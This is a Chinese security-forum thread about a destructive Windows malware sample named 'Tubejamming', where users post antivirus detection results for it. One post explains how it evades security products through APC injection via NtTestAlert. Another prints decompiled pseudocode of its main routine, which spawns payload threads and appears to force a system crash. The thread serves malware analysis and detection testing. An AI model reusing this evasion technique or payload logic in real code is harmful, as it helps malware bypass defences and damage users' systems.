楼主: 3245076553
收起左侧

[病毒样本] Tubejamming

[复制链接]
Komeiji-Reimu
发表于 2024-6-30 21:48:36 | 显示全部楼层
now 卡巴 kill

组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: UDS:Trojan.Win32.DiskWriter.gen
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: Tubejamming.exe
对象路径: D:\Users\\Desktop\Tubejamming
对象的 MD5: 6EE6BD3DE96FE9D2906791C8C1F655DB
原因: 云保护
GreatMOLA
发表于 2024-6-30 22:04:16 | 显示全部楼层
Avira

TR/Crypt.ZPACK.Gen7
东南大学
发表于 2024-6-30 22:50:56 | 显示全部楼层
CS解压杀
Qiyuanqwq
发表于 2024-6-30 23:36:34 来自手机 | 显示全部楼层
免杀原因:
ida生成的伪代码
用c关键字规避敏感api查杀,但是动态别想
运用apc注入,使恶意负载早于杀软的hookdll加载绕过r3hook
但是现在的edr们加载已经早于nttestalert了吧awa

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
QVM360 + 3 版区有你更精彩: )

查看全部评分

Qiyuanqwq
发表于 2024-6-30 23:37:27 来自手机 | 显示全部楼层
东南大学 发表于 2024-6-30 22:50
CS解压杀

没处理cs再不杀就可以卸载了
Revitalize
头像被屏蔽
发表于 2024-7-1 00:18:44 | 显示全部楼层

腾讯电脑管家 miss
DisaPDB
发表于 2024-7-1 07:09:10 | 显示全部楼层
Qiyuanqwq 发表于 2024-6-30 23:36
免杀原因:
ida生成的伪代码
用c关键字规避敏感api查杀,但是动态别想

并不
其实很多EDR只是Hook NtAllocateReserveObject而已()
DisaPDB
发表于 2024-7-1 07:13:50 | 显示全部楼层
  1. int __cdecl main(int argc, const char **argv, const char **envp)
  2. {
  3.   HANDLE CurrentProcess; // eax
  4.   HANDLE Thread; // edi
  5.   HMODULE ModuleHandleA; // eax
  6.   void (*NtTestAlert)(void); // ebx
  7.   int v7; // edi
  8.   int v8; // ebx
  9.   int v10; // [esp+0h] [ebp-8h] BYREF

  10.   if ( MessageBoxW(0, &Text, L"Tubejamming", 0x34u) != 6 || (v10 = 1, !dword_41A3BC) || !dword_41A3C4 )
  11.   {
  12.     _loaddll(0);
  13. LABEL_14:
  14.     _loaddll(0);
  15.     __debugbreak();
  16.   }
  17.   dword_41A3BC(20, 1);
  18.   CurrentProcess = GetCurrentProcess();
  19.   dword_41A3C4(CurrentProcess, 29, &v10, 4);
  20.   Thread = CreateThread(0, 0, sub_401080, 0, 0, 0);
  21.   ModuleHandleA = GetModuleHandleA("ntdll");
  22.   NtTestAlert = (void (*)(void))GetProcAddress(ModuleHandleA, "NtTestAlert");
  23.   QueueUserAPC((PAPCFUNC)pfnAPC, Thread, 0);
  24.   if ( !NtTestAlert )
  25.     goto LABEL_14;
  26.   NtTestAlert();
  27.   WaitForSingleObject(Thread, 0xFFFFFFFF);
  28.   CloseHandle(Thread);
  29.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4010C0, 0, 0, 0);
  30.   v7 = 30;
  31.   do
  32.   {
  33.     CreateThread(0, 0, sub_4012B0, 0, 0, 0);
  34.     --v7;
  35.   }
  36.   while ( v7 );
  37.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  38.   Sleep(0x1388u);
  39.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  40.   Sleep(0x1388u);
  41.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  42.   Sleep(0x2710u);
  43.   CreateThread(0, 0, sub_401A70, 0, 0, 0);
  44.   Sleep(0x4E20u);
  45.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4018F0, 0, 0, 0);
  46.   Sleep(0xEA60u);
  47.   byte_419930 = 0;
  48.   Sleep(0x1F4u);
  49.   byte_419930 = 1;
  50.   v8 = 20;
  51.   do
  52.   {
  53.     CreateThread(0, 0, sub_4012B0, 0, 0, 0);
  54.     --v8;
  55.   }
  56.   while ( v8 );
  57.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  58.   Sleep(0x2710u);
  59.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  60.   Sleep(0x2710u);
  61.   CreateThread(0, 0, sub_401580, 0, 0, 0);
  62.   Sleep(0x3E8u);
  63.   CreateThread(0, 0, sub_4019D0, 0, 0, 0);
  64.   Sleep(0x1388u);
  65.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4011D0, 0, 0, 0);
  66.   Sleep(0x2710u);
  67.   CreateThread(0, 0, sub_4015A0, 0, 0, 0);
  68.   Sleep(0x3A98u);
  69.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4018F0, 0, 0, 0);
  70.   Sleep(0x2710u);
  71.   byte_419930 = 0;
  72.   sub_401A90();
  73.   if ( dword_41A3BC && dword_41A3B8 )
  74.   {
  75.     dword_41A3BC(19, 1);
  76.     dword_41A3B8(-1073741824, 0, 0, 0, 6, &v10);
  77.   }
  78.   return 0;
  79. }
复制代码

安静的Snow
发表于 2024-7-1 09:33:16 | 显示全部楼层
norton v22 kill
BitterLotus
发表于 2024-7-1 11:10:44 | 显示全部楼层
DI

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 12:16 , Processed in 0.119198 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表